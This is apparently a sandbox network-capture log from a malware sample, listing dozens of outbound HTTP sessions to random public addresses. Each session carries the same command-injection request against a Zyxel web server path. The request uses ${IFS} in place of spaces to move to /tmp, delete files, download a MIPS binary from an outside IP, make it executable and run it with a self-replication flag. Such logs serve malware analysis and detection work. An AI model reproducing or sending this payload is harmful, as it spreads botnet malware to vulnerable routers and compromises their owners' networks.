                                        Jan 14, 2024 16:18:37.284682035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2353192.168.2.135810651.117.213.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284750938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2354192.168.2.1337990133.58.173.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284790993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2355192.168.2.1345574137.181.201.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284851074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2356192.168.2.133812857.200.73.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284936905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2357192.168.2.135652276.104.175.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.284982920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2358192.168.2.1357164166.35.207.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285038948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2359192.168.2.1342442191.75.121.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285116911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2360192.168.2.1348970101.93.136.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285192966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2361192.168.2.133810266.217.18.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285262108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2362192.168.2.1352678193.239.35.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285309076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2363192.168.2.1359560156.45.42.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285381079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2364192.168.2.134055876.228.254.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285439014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2365192.168.2.1360032172.126.56.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285501003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2366192.168.2.1358492217.198.124.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285546064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2367192.168.2.134772260.190.245.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285597086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2368192.168.2.135133420.12.125.32443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285659075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2369192.168.2.134476892.188.224.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285696030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2370192.168.2.134535457.8.85.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285769939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2371192.168.2.1348630217.57.176.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285810947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2372192.168.2.135627462.43.54.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285881042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2373192.168.2.134339642.105.234.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285939932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2374192.168.2.133558824.204.240.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.285998106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2375192.168.2.1360784223.137.82.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286094904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2376192.168.2.1345126103.102.251.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286109924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2377192.168.2.134148896.84.76.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286153078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2378192.168.2.1333002211.178.89.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286240101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2379192.168.2.133519814.100.229.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286269903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2380192.168.2.136029261.203.52.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286318064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2381192.168.2.133871239.181.124.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286417961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2382192.168.2.1336364190.252.241.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286451101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2383192.168.2.1360146105.125.76.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286504984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2384192.168.2.1359668209.202.167.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286596060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2385192.168.2.134493284.163.12.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286623001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2386192.168.2.1360964118.231.40.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286684036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2387192.168.2.1346400128.124.9.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286757946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2388192.168.2.134669093.146.69.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286817074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2389192.168.2.1335520130.244.19.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286890984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2390192.168.2.1355220216.47.168.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.286963940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2391192.168.2.1342458188.169.142.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287014008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2392192.168.2.1340966121.107.74.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287075996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2393192.168.2.135081449.179.170.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287130117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2394192.168.2.135007848.3.238.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287189960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2395192.168.2.1333042194.30.76.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287254095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2396192.168.2.1344006146.117.99.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287301064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2397192.168.2.1360618109.227.205.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287353039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2398192.168.2.1352142178.2.154.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287436008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2399192.168.2.1342256136.116.19.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287477016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2400192.168.2.135478242.38.140.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287525892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2401192.168.2.133647889.95.27.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287579060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2402192.168.2.1333756178.64.50.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287645102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2403192.168.2.1338962151.246.31.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287734032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2404192.168.2.135431624.48.179.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287786961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2405192.168.2.1336264220.197.125.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287842989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2406192.168.2.1352192211.61.191.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287894964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2407192.168.2.1350908133.106.196.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.287947893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2408192.168.2.1342548139.122.161.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288016081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2409192.168.2.134331282.85.146.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288074970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2410192.168.2.136040883.202.87.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288150072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2411192.168.2.1350166209.220.90.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288197041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2412192.168.2.1338468165.11.137.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288255930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2413192.168.2.1349542104.193.233.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288316965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2414192.168.2.1341754176.81.248.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:37.288382053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2415192.168.2.1351680189.52.62.169443
                                        TimestampBytes transferredDirectionData
